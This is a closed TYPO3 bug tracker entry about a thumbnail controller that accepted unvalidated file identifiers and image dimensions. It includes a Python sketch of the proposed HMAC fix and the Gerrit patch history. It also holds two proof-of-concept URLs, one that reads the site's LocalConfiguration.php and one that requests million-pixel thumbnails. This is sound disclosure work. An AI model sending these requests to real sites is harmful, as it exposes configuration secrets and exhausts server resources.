Bug #85875: Issues in ThumbnailController (closed, 100% done)
Description
- information disclosure: fileIdentifier is taken from the request without validation and falls back to storage 0, so arbitrary files (e.g. typo3conf/LocalConfiguration.php) can be requested as thumbnails
- denial of service: the processing instructions (dimensions, basically the whole configuration) are taken from the request without validation, so resource-exhausting values can be requested
Introduced in https://review.typo3.org/#/c/56765/ - not yet released in 9.4.0 or 8.7.19
Solution: add an HMAC over all HTTP request parameters, so that the controller only accepts parameter sets generated by the server.
PoC
The XSRF token has to be adjusted in the links below.
Information Disclosure
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64&processingInstructions%5Bheight%5D=64c&processingInstructions%5Bcrop%5D=
Denial of Service
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png&processingInstructions%5Bwidth%5D=1000000&processingInstructions%5Bheight%5D=1000000c&processingInstructions%5Bcrop%5D=
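The proposed fix, an HMAC over all thumbnail request parameters, modelled as an added example (this is not TYPO3's own code; the secret is a constructed placeholder standing in for the site's encryption key, and the XSRF token is left out because it does not bind the parameter values). The server emits links whose parameter set is signed, and the controller recomputes the HMAC before touching any file or dimension, so a link with a swapped fileIdentifier or an inflated width is rejected:

```python
import hashlib
import hmac
import json
from urllib.parse import parse_qs, urlencode

# Constructed server-side secret for this example only; stands in for the site's encryption key.
SECRET = b"constructed-secret-for-this-example-only"

SIGNED_KEYS = ("fileIdentifier", "processingInstructions[width]",
               "processingInstructions[height]", "processingInstructions[crop]")


def canonical(params: dict) -> bytes:
    """One unambiguous byte string per parameter set: sorted keys, compact JSON."""
    return json.dumps(params, sort_keys=True, separators=(",", ":")).encode()


def sign(params: dict) -> str:
    return hmac.new(SECRET, canonical(params), hashlib.sha256).hexdigest()


def build_thumbnail_url(file_identifier: str, width, height, crop: str = "") -> str:
    """Server side: emit the thumbnail link with an HMAC covering every parameter."""
    params = dict(zip(SIGNED_KEYS, (file_identifier, str(width), str(height), crop)))
    params["hmac"] = sign(params)
    return "/typo3/index.php?" + urlencode({"route": "/thumbnails", **params})


def verify_request(query_string: str) -> bool:
    """Controller side: accept only a parameter set that matches the HMAC it carries."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    if any(len(v) != 1 for v in parsed.values()):
        return False  # duplicated keys are ambiguous; refuse rather than pick one
    q = {k: v[0] for k, v in parsed.items()}
    q.pop("route", None)
    provided = q.pop("hmac", None)
    if provided is None or set(q) != set(SIGNED_KEYS):
        return False  # unsigned legacy link, or extra/missing parameters
    return hmac.compare_digest(sign(q), provided)


def with_param(query_string: str, key: str, value: str) -> str:
    """Model a tampered link: the same query with one parameter replaced."""
    q = {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}
    q[key] = value
    return urlencode(q)
```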
Updated by Gerrit Code Review over 6 years ago
- Status changed from New to Under Review
Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 2 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Oliver Hader over 6 years ago
- Project changed from 1716 to TYPO3 Core
- Category deleted (T3-03: Information Disclosure)
Updated by Oliver Hader over 6 years ago
- Priority changed from Should have to Must have
Updated by Oliver Hader over 6 years ago
- Category set to Backend API
- Target version set to 8.7.19
- PHP Version set to 7.2
Updated by Gerrit Code Review over 6 years ago
Patch set 3 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 4 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 5 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 6 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57943
Updated by Gerrit Code Review over 6 years ago
Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/57953
Updated by Oliver Hader over 6 years ago
- Status changed from Under Review to Resolved
- % Done changed from 0 to 100
Applied in changeset 5dbcb5da27bc43bb2a19c770e4d226f47c7bcf0c.